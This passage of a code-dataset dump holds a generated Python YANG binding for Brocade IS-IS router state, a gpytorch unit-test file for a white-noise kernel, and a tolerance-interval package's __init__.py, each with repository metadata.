t = YANGDynClass(v,base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """reverse_metric must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__reverse_metric = t
if hasattr(self, '_set'):
self._set()
def _unset_reverse_metric(self):
self.__reverse_metric = YANGDynClass(base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_debug_handler(self):
"""
Getter method for debug_handler, mapped from YANG variable /isis_state/router_isis_config/debug_handler (container)
YANG Description: IS-IS debug handler
"""
return self.__debug_handler
def _set_debug_handler(self, v, load=False):
"""
Setter method for debug_handler, mapped from YANG variable /isis_state/router_isis_config/debug_handler (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_debug_handler is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_debug_handler() directly.
YANG Description: IS-IS debug handler
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """debug_handler must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__debug_handler = t
if hasattr(self, '_set'):
self._set()
def _unset_debug_handler(self):
self.__debug_handler = YANGDynClass(base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l1_auth_profile(self):
"""
Getter method for l1_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l1_auth_profile (container)
"""
return self.__l1_auth_profile
def _set_l1_auth_profile(self, v, load=False):
"""
Setter method for l1_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l1_auth_profile (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l1_auth_profile is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l1_auth_profile() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l1_auth_profile must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l1_auth_profile = t
if hasattr(self, '_set'):
self._set()
def _unset_l1_auth_profile(self):
self.__l1_auth_profile = YANGDynClass(base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l2_auth_profile(self):
"""
Getter method for l2_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l2_auth_profile (container)
"""
return self.__l2_auth_profile
def _set_l2_auth_profile(self, v, load=False):
"""
Setter method for l2_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l2_auth_profile (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l2_auth_profile is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l2_auth_profile() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l2_auth_profile must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l2_auth_profile = t
if hasattr(self, '_set'):
self._set()
def _unset_l2_auth_profile(self):
self.__l2_auth_profile = YANGDynClass(base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l1_spf_timer(self):
"""
Getter method for l1_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf_timer (container)
"""
return self.__l1_spf_timer
def _set_l1_spf_timer(self, v, load=False):
"""
Setter method for l1_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l1_spf_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l1_spf_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l1_spf_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l1_spf_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l1_spf_timer(self):
self.__l1_spf_timer = YANGDynClass(base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l2_spf_timer(self):
"""
Getter method for l2_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf_timer (container)
"""
return self.__l2_spf_timer
def _set_l2_spf_timer(self, v, load=False):
"""
Setter method for l2_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l2_spf_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l2_spf_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l2_spf_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l2_spf_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l2_spf_timer(self):
self.__l2_spf_timer = YANGDynClass(base=l2_spf_timer.l2_spf_timer, is_container='container', presence=False, yang_name="l2-spf-timer", rest_name="l2-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l1_spf6_timer(self):
"""
Getter method for l1_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf6_timer (container)
"""
return self.__l1_spf6_timer
def _set_l1_spf6_timer(self, v, load=False):
"""
Setter method for l1_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf6_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l1_spf6_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l1_spf6_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l1_spf6_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l1_spf6_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l1_spf6_timer(self):
self.__l1_spf6_timer = YANGDynClass(base=l1_spf6_timer.l1_spf6_timer, is_container='container', presence=False, yang_name="l1-spf6-timer", rest_name="l1-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l2_spf6_timer(self):
"""
Getter method for l2_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf6_timer (container)
"""
return self.__l2_spf6_timer
def _set_l2_spf6_timer(self, v, load=False):
"""
Setter method for l2_spf6_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf6_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l2_spf6_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l2_spf6_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l2_spf6_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l2_spf6_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l2_spf6_timer(self):
self.__l2_spf6_timer = YANGDynClass(base=l2_spf6_timer.l2_spf6_timer, is_container='container', presence=False, yang_name="l2-spf6-timer", rest_name="l2-spf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l2-spf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_pspf_timer(self):
"""
Getter method for pspf_timer, mapped from YANG variable /isis_state/router_isis_config/pspf_timer (container)
"""
return self.__pspf_timer
def _set_pspf_timer(self, v, load=False):
"""
Setter method for pspf_timer, mapped from YANG variable /isis_state/router_isis_config/pspf_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_pspf_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pspf_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """pspf_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__pspf_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_pspf_timer(self):
self.__pspf_timer = YANGDynClass(base=pspf_timer.pspf_timer, is_container='container', presence=False, yang_name="pspf-timer", rest_name="pspf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_pspf6_timer(self):
"""
Getter method for pspf6_timer, mapped from YANG variable /isis_state/router_isis_config/pspf6_timer (container)
"""
return self.__pspf6_timer
def _set_pspf6_timer(self, v, load=False):
"""
Setter method for pspf6_timer, mapped from YANG variable /isis_state/router_isis_config/pspf6_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_pspf6_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pspf6_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """pspf6_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__pspf6_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_pspf6_timer(self):
self.__pspf6_timer = YANGDynClass(base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
nsr_state = __builtin__.property(_get_nsr_state)
lsp_flood_count = __builtin__.property(_get_lsp_flood_count)
lsp_fast_flood_count = __builtin__.property(_get_lsp_fast_flood_count)
fast_flood_wait_count = __builtin__.property(_get_fast_flood_wait_count)
hello_padding = __builtin__.property(_get_hello_padding)
hello_padding_ptp = __builtin__.property(_get_hello_padding_ptp)
csnp_interval = __builtin__.property(_get_csnp_interval)
lsp_gen_interval = __builtin__.property(_get_lsp_gen_interval)
lsp_interval = __builtin__.property(_get_lsp_interval)
lsp_refresh_interval = __builtin__.property(_get_lsp_refresh_interval)
lsp_lifetime = __builtin__.property(_get_lsp_lifetime)
retransmit_interval = __builtin__.property(_get_retransmit_interval)
pspf_enabled = __builtin__.property(_get_pspf_enabled)
ispf_enabled = __builtin__.property(_get_ispf_enabled)
istct_spf_enabled = __builtin__.property(_get_istct_spf_enabled)
overload_state = __builtin__.property(_get_overload_state)
overload_startup_time = __builtin__.property(_get_overload_startup_time)
overload_wait_on_bgp = __builtin__.property(_get_overload_wait_on_bgp)
overload_bgp_wait_time = __builtin__.property(_get_overload_bgp_wait_time)
enable_code_assertions = __builtin__.property(_get_enable_code_assertions)
graceful_restart_helper = __builtin__.property(_get_graceful_restart_helper)
isis_hostname_enabled = __builtin__.property(_get_isis_hostname_enabled)
isis_system_info = __builtin__.property(_get_isis_system_info)
log_handler = __builtin__.property(_get_log_handler)
is_address_family_v4 = __builtin__.property(_get_is_address_family_v4)
is_address_family_v6 = __builtin__.property(_get_is_address_family_v6)
reverse_metric = __builtin__.property(_get_reverse_metric)
debug_handler = __builtin__.property(_get_debug_handler)
l1_auth_profile = __builtin__.property(_get_l1_auth_profile)
l2_auth_profile = __builtin__.property(_get_l2_auth_profile)
l1_spf_timer = __builtin__.property(_get_l1_spf_timer)
l2_spf_timer = __builtin__.property(_get_l2_spf_timer)
l1_spf6_timer = __builtin__.property(_get_l1_spf6_timer)
l2_spf6_timer = __builtin__.property(_get_l2_spf6_timer)
pspf_timer = __builtin__.property(_get_pspf_timer)
pspf6_timer = __builtin__.property(_get_pspf6_timer)
_pyangbind_elements = {'nsr_state': nsr_state, 'lsp_flood_count': lsp_flood_count, 'lsp_fast_flood_count': lsp_fast_flood_count, 'fast_flood_wait_count': fast_flood_wait_count, 'hello_padding': hello_padding, 'hello_padding_ptp': hello_padding_ptp, 'csnp_interval': csnp_interval, 'lsp_gen_interval': lsp_gen_interval, 'lsp_interval': lsp_interval, 'lsp_refresh_interval': lsp_refresh_interval, 'lsp_lifetime': lsp_lifetime, 'retransmit_interval': retransmit_interval, 'pspf_enabled': pspf_enabled, 'ispf_enabled': ispf_enabled, 'istct_spf_enabled': istct_spf_enabled, 'overload_state': overload_state, 'overload_startup_time': overload_startup_time, 'overload_wait_on_bgp': overload_wait_on_bgp, 'overload_bgp_wait_time': overload_bgp_wait_time, 'enable_code_assertions': enable_code_assertions, 'graceful_restart_helper': graceful_restart_helper, 'isis_hostname_enabled': isis_hostname_enabled, 'isis_system_info': isis_system_info, 'log_handler': log_handler, 'is_address_family_v4': is_address_family_v4, 'is_address_family_v6': is_address_family_v6, 'reverse_metric': reverse_metric, 'debug_handler': debug_handler, 'l1_auth_profile': l1_auth_profile, 'l2_auth_profile': l2_auth_profile, 'l1_spf_timer': l1_spf_timer, 'l2_spf_timer': l2_spf_timer, 'l1_spf6_timer': l1_spf6_timer, 'l2_spf6_timer': l2_spf6_timer, 'pspf_timer': pspf_timer, 'pspf6_timer': pspf6_timer, }
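# A minimal sketch of the access pattern the setter docstrings above describe,
# assuming the generated class is importable as `router_isis_config` (pyangbind
# names the class after the YANG container; the name `cfg` and the values are
# illustrative only). Defined as a function so nothing runs on import:
def _sketch_backend_populate():
    cfg = router_isis_config()
    # Backends populate config:false leaves via the private _set_* methods ...
    cfg._set_overload_startup_time(300)      # uint32-restricted leaf
    cfg._set_overload_state(u'is-enabled')   # restricted to the dict keys above
    # ... while consumers read through the read-only properties registered
    # in _pyangbind_elements:
    startup = cfg.overload_startup_time
    # _unset_* restores a leaf to its generated default:
    cfg._unset_overload_startup_time()
    return startup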
avg_line_length: 83.139566 | max_line_length: 1374 | alphanum_fraction: 0.738408
hexsha: c7b69cd79b124a9cd4c4002ea25d159d9f1b9b9d | size: 3139 | ext: py | lang: Python
max_stars_repo_path: test/kernels/test_white_noise_kernel.py
max_stars_repo_name: konstantinklemmer/gpytorch
max_stars_repo_head_hexsha: f1d947b340a188c398b6c6e610b6a839c61aa298
max_stars_repo_licenses: ["MIT"] | max_stars_count: 2
max_stars_repo_stars_event: 2019-03-31T04:36:30.000Z .. 2019-05-22T20:09:25.000Z
max_issues_repo_path: test/kernels/test_white_noise_kernel.py
max_issues_repo_name: konstantinklemmer/gpytorch
max_issues_repo_head_hexsha: f1d947b340a188c398b6c6e610b6a839c61aa298
max_issues_repo_licenses: ["MIT"] | max_issues_count: null
max_forks_repo_path: test/kernels/test_white_noise_kernel.py
max_forks_repo_name: konstantinklemmer/gpytorch
max_forks_repo_head_hexsha: f1d947b340a188c398b6c6e610b6a839c61aa298
max_forks_repo_licenses: ["MIT"] | max_forks_count: 1
max_forks_repo_forks_event: 2019-02-15T17:05:42.000Z .. 2019-02-15T17:05:42.000Z
content:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
import unittest
from gpytorch.kernels import WhiteNoiseKernel
class TestWhiteNoiseKernel(unittest.TestCase):
def test_computes_diag_train(self):
a = torch.tensor([4, 2, 8], dtype=torch.float).view(3, 1)
variances = torch.randn(3)
kernel = WhiteNoiseKernel(variances=variances)
actual = torch.diag(variances)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
def test_computes_diag_train_batch(self):
a = torch.tensor([[4, 2, 8], [4, 2, 8]], dtype=torch.float).view(2, 3, 1)
variances = torch.randn(2, 3, 1)
kernel = WhiteNoiseKernel(variances=variances)
actual = torch.cat(
(torch.diag(variances[0].squeeze(-1)).unsqueeze(0), torch.diag(variances[1].squeeze(-1)).unsqueeze(0))
)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
def test_computes_zero_eval(self):
a = torch.tensor([4, 2, 8], dtype=torch.float).view(3, 1)
b = torch.tensor([3, 7], dtype=torch.float).view(2, 1)
variances = torch.randn(3)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual_one = torch.zeros(3, 2)
actual_two = torch.zeros(2, 3)
res_one = kernel(a, b).evaluate()
res_two = kernel(b, a).evaluate()
self.assertLess(torch.norm(res_one - actual_one), 1e-5)
self.assertLess(torch.norm(res_two - actual_two), 1e-5)
def test_computes_zero_eval_batch(self):
a = torch.tensor([[4, 2, 8], [4, 2, 8]], dtype=torch.float).view(2, 3, 1)
b = torch.tensor([[3, 7], [3, 7]], dtype=torch.float).view(2, 2, 1)
variances = torch.randn(2, 3, 1)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual_one = torch.zeros(3, 2)
actual_two = torch.zeros(2, 3)
res_one = kernel(a, b).evaluate()
res_two = kernel(b, a).evaluate()
self.assertLess(torch.norm(res_one - actual_one), 1e-5)
self.assertLess(torch.norm(res_two - actual_two), 1e-5)
def test_computes_diag_eval(self):
a = torch.tensor([4, 2, 8], dtype=torch.float).view(3, 1)
variances = torch.randn(3)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual = torch.diag(variances)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
def test_computes_diag_eval_batch(self):
a = torch.tensor([[4, 2, 8], [4, 2, 8]], dtype=torch.float).view(2, 3, 1)
variances = torch.randn(2, 3, 1)
kernel = WhiteNoiseKernel(variances=variances)
kernel.eval()
actual = torch.cat(
(torch.diag(variances[0].squeeze(-1)).unsqueeze(0), torch.diag(variances[1].squeeze(-1)).unsqueeze(0))
)
res = kernel(a).evaluate()
self.assertLess(torch.norm(res - actual), 1e-5)
if __name__ == "__main__":
unittest.main()
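# A small companion sketch of the contract the tests above pin down: in train
# mode the kernel returns diag(variances) for a single input; in eval mode a
# pair of distinct inputs yields a zero cross-covariance. Uses only the API
# already exercised by the tests, and is defined (not run) so unittest.main()
# above is unaffected:
def _sketch_white_noise_contract():
    variances = torch.randn(3)
    kernel = WhiteNoiseKernel(variances=variances)
    train_cov = kernel(torch.ones(3, 1)).evaluate()  # == torch.diag(variances)
    kernel.eval()
    cross_cov = kernel(torch.ones(3, 1), torch.zeros(2, 1)).evaluate()  # == torch.zeros(3, 2)
    return train_cov, cross_cov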
avg_line_length: 39.734177 | max_line_length: 114 | alphanum_fraction: 0.625996
hexsha: 4006aacfdb7675b82fbca91bb07843cb2d4dd3de | size: 238 | ext: py | lang: Python
max_stars_repo_path: toleranceinterval/oneside/__init__.py
max_stars_repo_name: jedludlow/tolerance_interval_py
max_stars_repo_head_hexsha: cf3ecd1e2f9b870de3e71bc92e07e6394510c001
max_stars_repo_licenses: ["MIT"] | max_stars_count: 9
max_stars_repo_stars_event: 2021-12-15T22:54:24.000Z .. 2022-03-12T00:25:07.000Z
max_issues_repo_path: toleranceinterval/oneside/__init__.py
max_issues_repo_name: jedludlow/tolerance_interval_py
max_issues_repo_head_hexsha: cf3ecd1e2f9b870de3e71bc92e07e6394510c001
max_issues_repo_licenses: ["MIT"] | max_issues_count: 5
max_issues_repo_issues_event: 2019-11-07T15:26:21.000Z .. 2022-02-25T19:40:50.000Z
max_forks_repo_path: toleranceinterval/oneside/__init__.py
max_forks_repo_name: jedludlow/tolerance_interval_py
max_forks_repo_head_hexsha: cf3ecd1e2f9b870de3e71bc92e07e6394510c001
max_forks_repo_licenses: ["MIT"] | max_forks_count: 1
max_forks_repo_forks_event: 2021-03-11T19:28:22.000Z .. 2021-03-11T19:28:22.000Z
content:
from .oneside import normal # noqa F401
from .oneside import lognormal # noqa F401
from .oneside import non_parametric # noqa F401
from .oneside import hanson_koopmans # noqa F401
from .oneside import hanson_koopmans_cmh # noqa F401
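# A minimal usage sketch for the functions re-exported above, guarded so it
# never runs on package import. The `oneside.normal(x, p, g)` call pattern
# (sample, percentile, confidence) follows the package documentation; treat
# the exact argument order as an assumption rather than a guarantee:
if __name__ == "__main__":
    import numpy as np
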